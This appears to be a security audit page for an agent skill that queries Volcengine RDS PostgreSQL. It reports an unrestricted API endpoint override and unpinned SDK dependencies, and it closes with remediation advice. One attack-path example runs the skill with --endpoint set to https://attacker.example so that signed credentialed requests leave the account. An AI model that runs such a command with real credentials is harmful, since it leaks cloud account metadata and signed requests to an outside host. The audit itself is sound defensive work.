Back to skill

Security audit

Volcengine RDS PostgreSQL

Security checks for vulnerabilities and agentic risk

Overview

This skill is mostly a read-only Volcengine RDS helper, but it includes an under-disclosed custom API endpoint option that could send credentialed cloud requests to an untrusted host.

Install only if you will use least-privilege Volcengine credentials limited to the needed read-only RDS PostgreSQL and VPC describe actions. Do not use or allow natural-language requests to set --endpoint unless it is restricted to an official trusted Volcengine API host, and prefer a locked dependency environment before running with real cloud credentials.

Vulnerability Patterns
  • Insecure DependenciesIntroduces malicious components through unsafe dependency sources
  • Insecure Skill Coding PracticesFinds exploitable flaws such as hardcoded secrets or command injection
  • Skill Instruction HijackingAlters the agent's session goals or safety constraints when the skill loads
  • Agent Memory PoisoningWrites attacker-controlled rules into memory that affect later sessions
  • Remote Payload Retrieval and ExecutionFetches external code whose behavior can change after review
Findings (2)

T09 · Insecure Skill Coding Practices

Warning
Location
scripts/call_rds_postgresql.py:70
Finding

Unrestricted API Endpoint Allows Credentialed Requests to an Attacker-Controlled Host

Content
View full analysis

Vulnerability Details

File Location: scripts/call_rds_postgresql.py, lines 70-73 and 399-400
Vulnerability Type: Unrestricted credentialed API endpoint override
Risk Level: Medium

Vulnerable Code

python
configuration.region = self.region
if self.endpoint:
    configuration.host = self.endpoint

return RDSPOSTGRESQLApi(

The endpoint is populated from an unrestricted command-line argument:

python
parser.add_argument("--endpoint", dest="endpoint", help="API 端点(可选)")
parser.add_argument(

Technical Analysis

The command-line interface permits callers to replace the RDS PostgreSQL SDK host with an arbitrary value. No validation restricts the endpoint to HTTPS, official Volcengine domains, approved ports, or a predefined allowlist.

The client loads VOLCENGINE_ACCESS_KEY and VOLCENGINE_SECRET_KEY before constructing the SDK client. Requests sent through the overridden endpoint may therefore contain the access-key identifier, signed authorization headers, timestamps, resource identifiers, query parameters, and other cloud-account metadata.

The secret key is not explicitly transmitted by this code, but an attacker-controlled server can capture signed requests and sensitive operational metadata. Replay feasibility and scope depend on the SDK signature construction, request timestamps, canonical host handling, and server-side replay protections.

This option is also absent from the documented interface in SKILL.md, so the implementation exposes a security-sensitive capability beyond the declared operational behavior.

Attack Path

  1. An attacker persuades the user or agent to execute the Skill with an endpoint such as:
    bash
    uv run ./scripts/call_rds_postgresql.py \
      --endpoint https://attacker.example \
      list-instances
    
  2. The script reads the user's Volcengine access key and secret key from the process environment.
  3. The SDK constructs a ...[truncated 1076 chars]
Remediation
View remediation

Remediation Suggestions

  1. Remove the --endpoint option if custom API endpoints are not operationally required.
  2. If custom endpoints are necessary, parse them with a standards-compliant URL parser and require:
    • The https scheme.
    • A hostname from a strict allowlist of official Volcengine API domains.
    • No embedded username or password.
    • No IP literals, localhost addresses, private-network destinations, or nonstandard ports.
    • No URL fragments or unexpected path components.
  3. Disable cross-origin redirects or verify every redirect destination against the same allowlist.
  4. Keep production endpoint overrides behind an explicit administrative configuration rather than accepting natural-language-derived command-line input.
  5. Add automated tests confirming that HTTP URLs, attacker domains, loopback addresses, private IP addresses, malformed hosts, and redirecting endpoints are rejected.
  6. Document any approved endpoint customization and warn that authenticated SDK traffic must never be sent to an untrusted server.

T08 · Insecure Dependencies

Warning
Location
requirements.txt:5
Finding

Unbounded Dependency Resolution Creates a Cloud-Credential Supply-Chain Risk

Content
View full analysis

Vulnerability Details

File Location: scripts/call_rds_postgresql.py, lines 4-7; requirements.txt, line 5
Vulnerability Type: Unpinned automatically executed third-party dependency
Risk Level: Medium

Vulnerable Code

The inline uv dependency declaration is:

python
# dependencies = [
#     "volcengine-python-sdk[rdspostgresqlv2,vpc]>=1.0.0",
# ]

The project requirement repeats the same lower-bound-only constraint:

text
volcengine-python-sdk[rdspostgresqlv2,vpc]>=1.0.0

Technical Analysis

The dependency constraint accepts any current or future version of volcengine-python-sdk at or above version 1.0.0. Invoking the recommended uv run command can automatically resolve and execute a package version that was not reviewed with this Skill.

Because the SDK is imported and runs in the same Python process as the Skill, dependency code has access to the process environment, including:

  • VOLCENGINE_ACCESS_KEY
  • VOLCENGINE_SECRET_KEY
  • VOLCENGINE_REGION
  • Local files and network access available to the invoking user

No lockfile or package hashes are present in the audited project. Consequently, dependency resolution is not reproducible and does not cryptographically bind execution to an audited artifact.

No evidence was found that the currently named package is malicious. The vulnerability is the unsafe dependency policy: a compromised, malicious, or unexpectedly incompatible future release could be selected and executed without a source change in this project.

Attack Path

  1. A malicious release, compromised maintainer release, or otherwise unsafe version satisfying >=1.0.0 becomes available from the configured package index.
  2. A user follows the documented invocation:
    bash
    uv run ./scripts/call_rds_postgresql.py list-instances
    
  3. The resolver selects the new matching package because no exact version, lockfile, or hash restricts ...[truncated 1046 chars]
Remediation
View remediation

Remediation Suggestions

  1. Replace the lower-bound constraint with an exact, reviewed version in both dependency declarations:
    text
    volcengine-python-sdk[rdspostgresqlv2,vpc]==REVIEWED_VERSION
    
  2. Generate and commit a lockfile that records all transitive dependency versions.
  3. Enforce package hashes so installation fails if downloaded artifacts differ from reviewed artifacts.
  4. Use a trusted, access-controlled package index or an internally mirrored repository.
  5. Run dependency vulnerability and provenance checks in CI before accepting updates.
  6. Update dependencies only through reviewed changes that include release-note analysis, integrity verification, and regression testing.
  7. Ensure the inline PEP 723 dependency declaration and requirements.txt remain synchronized so uv run cannot bypass the locked dependency policy.
  8. Use least-privilege, short-lived Volcengine credentials to reduce the impact of any future dependency compromise.
Vulnerability Patterns
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • MCP Least PrivilegeUnderdeclared Capability, Wildcard Permission, Missing Permission Declaration
  • MCP Tool PoisoningHidden Instructions, Unicode Deception, Parameter Description Injection
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
  • Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
Findings (7)

Tp4

High
Category
MCP Tool Poisoning
Confidence
88% confidence
Finding

The documented purpose centers on RDS PostgreSQL operations, but the skill also reaches into VPC and subnet inventory, which broadens the accessible cloud resource surface beyond what the headline description suggests. This mismatch can mislead users or orchestration systems into granting or using broader privileges than expected, exposing network topology and account metadata.

Content

No source excerpt is available for this finding.

Undeclared Tool Scope

Medium
Category
MCP Least Privilege
Confidence
93% confidence
Finding

The skill requires access to cloud credentials via environment variables and instructs invoking a local script, but it does not declare any explicit tool scope or permission boundary. That makes it harder for a host agent or reviewer to constrain what resources the skill may access, increasing the chance of overbroad credential use and unreviewed external API calls.

Content

No source excerpt is available for this finding.

Missing User Warnings

Medium
Category
Not specified by scanner
Confidence
95% confidence
Finding

The skill tells users to supply Volcengine AK/SK credentials and makes live API calls, but it does not prominently warn that account, instance, database, and network metadata will be transmitted to Volcengine services. Without explicit disclosure, users may invoke the skill without understanding the sensitivity of the data accessed and shared.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Medium
Category
Not specified by scanner
Confidence
95% confidence
Finding

This code file contains natural-language descriptions and CLI help text in Chinese, effectively forcing a specific language for users interacting with the skill. The file does not indicate that the language is optional, configurable, or justified as a region-specific tool, so it conflicts with the language/locale policy criteria.

Content

No source excerpt is available for this finding.

Description-Behavior Mismatch

Medium
Category
Not specified by scanner
Confidence
91% confidence
Finding

The manifest describes a skill for RDS PostgreSQL instance management, database/account operations, and O&M tasks. This script additionally imports and uses the VPC API to list VPCs and subnets, which are broader cloud-network inventory capabilities not clearly described in the manifest text.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Low
Category
Not specified by scanner
Confidence
81% confidence
Finding

The file contains a natural-language comment in Chinese with no indication that language choice is optional. Under the language/locale policy, forcing a specific language without user opt-in can be a policy violation, and there is no documented justification here for a Chinese-only requirement.

Content

No source excerpt is available for this finding.

Description-Behavior Mismatch

Low
Category
Not specified by scanner
Confidence
79% confidence
Finding

The manifest says the skill helps complete instance management, database operations, account management, and O&M tasks, which implies action-oriented administration. In this file, all implemented methods are describe/list/price queries; there are no create, modify, delete, restart, or other management operations.

Content

No source excerpt is available for this finding.

Static analysis

No suspicious patterns detected.